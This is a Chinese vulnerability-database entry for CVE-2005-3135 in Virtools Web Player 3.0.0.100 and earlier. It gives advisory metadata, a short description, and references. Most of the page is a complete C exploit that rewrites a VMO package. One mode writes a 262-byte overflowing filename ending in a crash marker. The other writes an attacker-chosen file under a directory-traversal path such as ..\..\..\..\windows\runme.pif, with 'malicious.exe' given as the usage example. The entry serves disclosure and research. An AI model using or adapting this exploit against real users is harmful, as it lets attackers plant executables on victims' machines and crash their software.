Virtools Web Player缓冲区溢出漏洞
漏洞ID | 1109109 | 漏洞类型 | 缓冲区溢出 |
发布时间 | 2005-10-02 | 更新时间 | 2005-10-20 |
CVE编号 | CVE-2005-3135 |
CNNVD-ID | CNNVD-200510-003 |
漏洞平台 | Windows | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
Virtools Web Player 是 Virtools 导出到网页所需的播放器。Virtools Web Player 3.0.0.100 及之前版本在处理 VMO 文件中附加文件条目的文件名时存在缓冲区溢出,远程攻击者可以通过诱使用户加载含有超长文件名的 VMO 文件执行任意代码。下面的 EXP 会就地改写 VMO 包中最后一个附加文件条目:attack 1 写入 262 字节的超长文件名(末尾为 0xdeadc0de 标记),attack 2 则把攻击者指定的路径(如 ..\..\..\..\windows\runme.pif)连同任意文件内容写入条目,用于演示目录遍历。
|漏洞EXP
/*
by Luigi Auriemma
*/
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#ifdef WIN32
#include <io.h>
typedef unsigned char u_char;
typedef unsigned int u_int;
#define ftruncate chsize
#else
#include <unistd.h>
#include <sys/types.h>
#endif
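#define VER     "0.1"

/* 4-byte magic expected at the start of every VMO file (checked in main()) */
#define SIGN    "Nemo"

/* display names for the two blobs that precede the embedded-file list */
#define FILE1   "components"
#define FILE2   "objects"

/* column format used by the size listing */
#define FMT     "%-10u"

/*
 * The four bytes that end the oversized file name: 0xdeadc0de in little-endian
 * order.  Judging by the macro name it is what is meant to land in EIP, but it
 * is a crash MARKER for confirming the bug under a debugger, not a usable
 * return address.
 *
 * The scraped copy of this file had lost every backslash ("xdexc0xadxde",
 * "n" for newlines, no line-continuation on the BOF macro); the escapes are
 * restored here.
 */
#define EIP     "\xde\xc0\xad\xde"

/* 258 filler bytes followed by the marker: 262 bytes in total */
#define BOF_FILL8  "aaaaaaaa"
#define BOF_FILL64 BOF_FILL8 BOF_FILL8 BOF_FILL8 BOF_FILL8 \
                   BOF_FILL8 BOF_FILL8 BOF_FILL8 BOF_FILL8
#define BOF     BOF_FILL64 BOF_FILL64 BOF_FILL64 BOF_FILL64 "aa" EIP

/* harmless content written as the data of the overflowing entry */
#define BOFFILE "Nemo il pesce scemo"

/*
 * u_int is a BSD typedef that strict ISO C builds do not provide; the
 * prototype is spelled with the identical underlying type.
 */
unsigned int putfile(FILE *fdout, char *fname);
void         std_err(void);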
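/*
 * Raw VMO package header.  main() reads it straight off the file with a
 * single fread(), so the layout must match the on-disk format byte for byte:
 * no padding, and every numeric field exactly 4 bytes.  The numeric fields
 * are therefore uint32_t rather than u_int (a BSD typedef whose width is not
 * guaranteed).  Fields marked "???" are of unknown meaning; the comments on
 * the others only state how this tool uses them.
 */
struct {
    unsigned char sign[4];    /* magic, compared against SIGN ("Nemo") */
    uint32_t unknown1;        /* 0x694620 observed */
    uint32_t crc;             /* ??? */
    uint32_t unknown2;        /* big-endian sdk version? */
    uint32_t plugin1;
    uint32_t plugin2;
    uint32_t unknown3;        /* 12 observed */
    uint32_t compcsz;         /* stored size of the "components" blob (listed as inSize) */
    uint32_t objcsz;          /* stored size of the "objects" blob (listed as inSize) */
    uint32_t objsz;           /* "objects" size listed as outSize */
    uint32_t addpath;         /* ??? */
    uint32_t components;      /* printed as the component count */
    uint32_t objects;         /* printed as the object count */
    uint32_t zero;            /* ??? */
    uint32_t version;         /* packed a.b.c.d, one byte per component, high byte first */
    uint32_t compsz;          /* "components" size listed as outSize */
} vmo;                        /* the embedded-file list starts compcsz + objcsz bytes after this header */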
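/*
 * fwrite() wrapper: every write below is part of the package layout, so a
 * short write would leave a corrupt VMO; treat it as fatal like the other I/O.
 * A zero-length write is a no-op (fwrite() would report 0 items for it).
 */
static void write_all(FILE *fd, const void *data, size_t size) {
    if(size && fwrite(data, size, 1, fd) != 1) std_err();
}

/*
 * Entry point.  Parses the VMO header and the embedded-file list, then
 * overwrites the LAST embedded entry in place with the chosen payload:
 *   attack 1 - a 262-byte file name ending in the 0xdeadc0de marker
 *              (the Web Player file-name buffer overflow)
 *   attack 2 - argv[4] as the file name (e.g. "..\..\..\x.pif") followed by
 *              the contents of argv[3]; presumably the player writes the
 *              entry out under that path (directory traversal)
 * The VMO is truncated right after the new entry.  Exits 1 on usage errors
 * and on any I/O error (via std_err()).
 *
 * Usage: <attack> <file.VMO> [<your_file> <bad_path>]
 *
 * Fixes relative to the original listing: the entry-name length read from the
 * (untrusted) VMO is now bounds-checked BEFORE it is used as an fread() size
 * into the 512-byte stack buffer (the original order was itself a stack
 * overflow), the "%.*s" precision is passed as int, writes are checked, and
 * the backslash escapes lost in the scraped copy are restored.
 */
int main(int argc, char *argv[]) {
    FILE        *fd;
    unsigned    i;
    uint32_t    len;        /* 4-byte on-disk length fields */
    long        off;
    int         attack;
    char        fname[512],
                *vmofile,
                *addfile,
                *addpath;

    setbuf(stdout, NULL);
    fputs("\n"
        "Virtools <= 3.0.0.100 buffer-overflow and directory traversal bugs "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: [email protected]\n"
        "web: http://aluigi.altervista.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <attack> <file.VMO>\n"
            "\n"
            "Attack:\n"
            " 1 = buffer-overflow\n"
            " 2 = directory traversal, is needed to specify also the file to add and the\n"
            "     special path for exploiting the bug\n"
            "\n"
            "Example: virtbugs 1 tintoys.vmo\n"
            "Example: virtbugs 2 tintoys.vmo malicious.exe ..\\..\\..\\..\\windows\\runme.pif\n"
            "Note: will be replaced only the latest file in the package\n"
            "Note: if you need a quick VMO file use the following:\n"
            " http://www.virtools.com/downloads/vmo/Tintoys/tintoys.vmo\n"
            "\n", argv[0]);
        exit(1);
    }

    attack  = atoi(argv[1]);
    vmofile = argv[2];
    if((attack != 1) && (attack != 2)) {
        fputs("\nError: wrong attack number chosen\n\n", stdout);
        exit(1);
    }

    printf("- open VMO file: %s\n", vmofile);
    fd = fopen(vmofile, "r+b");     /* read+write: the package is patched in place */
    if(!fd) std_err();

    if(!fread(&vmo, sizeof(vmo), 1, fd)) std_err();
    off = ftell(fd);
    if(off < 0) std_err();
    if(memcmp(vmo.sign, SIGN, sizeof(vmo.sign))) {
        /* only a warning: like the original, an unknown magic does not abort */
        printf("- file seems invalid, its sign is: %.*s\n",
            (int)sizeof(vmo.sign), (const char *)vmo.sign);
    }

    printf(
        " Informations and files list:\n"
        "- components: %u\n"
        "- objects: %u\n"
        "- version: %u.%u.%u.%u\n"
        "\n",
        vmo.components,
        vmo.objects,
        (vmo.version >> 24) & 0xff, (vmo.version >> 16) & 0xff,
        (vmo.version >> 8) & 0xff, vmo.version & 0xff);

    fputs(
        " inSize outSize Filename\n"
        " ------------------------------\n", stdout);
    printf(" "FMT" "FMT" %s\n", vmo.compcsz, vmo.compsz, FILE1);
    printf(" "FMT" "FMT" %s\n", vmo.objcsz, vmo.objsz, FILE2);

    /* the embedded-file list follows the two blobs; sum in long so a hostile
     * header cannot wrap the offset */
    if(fseek(fd, off + (long)vmo.compcsz + (long)vmo.objcsz, SEEK_SET) < 0) std_err();

    /* each entry: u32 name_len, name, u32 data_len, data.  `off' is left at the
     * start of the last entry whose length could be read; that entry is the
     * one replaced below.  i starts at 2 to account for the two blobs above. */
    for(i = 2; ; i++) {
        if(!fread(&len, 4, 1, fd)) break;
        off = ftell(fd);
        if(off < 0) std_err();
        off -= 4;
        /* len comes from the file: reject it before it becomes an fread() size */
        if(!len || len > (sizeof(fname) - 1)) break;
        if(!fread(fname, len, 1, fd)) break;
        fname[len] = 0;
        if(!*fname) break;
        if(!fread(&len, 4, 1, fd)) break;
        printf(" "FMT" %s\n", len, fname);
        if(fseek(fd, len, SEEK_CUR) < 0) std_err();
    }

    if(i <= 2) {
        fputs("\n"
            "Error: your VMO file doesn't contain additional files so cannot be modified\n"
            " try with another\n"
            "\n", stdout);
        exit(1);
    }

    if(fseek(fd, off, SEEK_SET) < 0) std_err();

    if(attack == 1) {
        fputs("\n- buffer-overflow bug exploitation\n", stdout);
        len = sizeof(BOF) - 1;
        write_all(fd, &len, 4);
        write_all(fd, BOF, len);
        len = sizeof(BOFFILE) - 1;
        write_all(fd, &len, 4);
        write_all(fd, BOFFILE, len);
    } else if(attack == 2) {
        fputs("\n- directory traversal bug exploitation\n", stdout);
        if(argc < 5) {
            fputs("\nError: you must specify also <your_file> and <bad_path>\n\n", stdout);
            exit(1);
        }
        addfile = argv[3];
        addpath = argv[4];
        len = (uint32_t)strlen(addpath);
        write_all(fd, &len, 4);
        write_all(fd, addpath, len);
        len = putfile(fd, addfile);
    }

    fflush(fd);
    /* drop whatever followed the old entry so the package ends with ours */
    if(ftruncate(fileno(fd), ftell(fd)) < 0) std_err();
    fflush(fd);
    if(fclose(fd) != 0) std_err();
    printf("- added a file of %u bytes\n", len);
    return(0);
}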
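/*
 * Writes the file `fname' at the current position of `fdout' as one VMO data
 * record: a 4-byte length (host byte order, like every other field this tool
 * writes) followed by the raw bytes.  Returns the number of content bytes
 * copied.  Any I/O failure is fatal (std_err()).
 *
 * The length field is patched in after the copy so it always equals the bytes
 * actually stored.  The original wrote st_size through a 4-byte fwrite(),
 * which silently assumed off_t is 4 bytes little-endian, never checked
 * fstat()/fwrite() results, and could disagree with the copy loop.
 */
unsigned int putfile(FILE *fdout, char *fname) {
    FILE          *fdin;
    unsigned char buff[1024];
    size_t        len;
    uint32_t      tot = 0;
    long          hdr;

    fdin = fopen(fname, "rb");
    if(!fdin) std_err();

    /* reserve the length field; it is filled in once the size is known */
    hdr = ftell(fdout);
    if(hdr < 0) std_err();
    if(fwrite(&tot, 4, 1, fdout) != 1) std_err();

    while((len = fread(buff, 1, sizeof(buff), fdin))) {
        if(fwrite(buff, 1, len, fdout) != len) std_err();
        if(len > UINT32_MAX - tot) {
            fputs("\nError: input file larger than 4 GiB, the length field is 32-bit\n", stderr);
            exit(1);
        }
        tot += (uint32_t)len;
    }
    if(ferror(fdin)) std_err();
    fclose(fdin);

    if(fseek(fdout, hdr, SEEK_SET) < 0) std_err();
    if(fwrite(&tot, 4, 1, fdout) != 1) std_err();
    /* back to the end of the record.  Not SEEK_END: the package may still hold
     * stale bytes past this point, which main() truncates afterwards. */
    if(fseek(fdout, hdr + 4 + (long)tot, SEEK_SET) < 0) std_err();
    return(tot);
}

/* Prints the last system error ("Error: ...") and exits with status 1. */
void std_err(void) {
    perror("\nError");
    exit(1);
}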
// milw0rm.com [2005-10-02]
|参考资料
来源:SECUNIA
名称:17034
链接:http://secunia.com/advisories/17034/
来源:BUGTRAQ
名称:20050930 Buffer-overflow and directory traversal bugs in Virtools Web Player
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=112811771331997&w=2
来源:MISC
链接:http://aluigi.altervista.org/adv/virtbugs-adv.txt
来源:BID
名称:14990
链接:http://www.securityfocus.com/bid/14990
来源:SECTRACK
名称:1014993
链接:http://securitytracker.com/id?1014993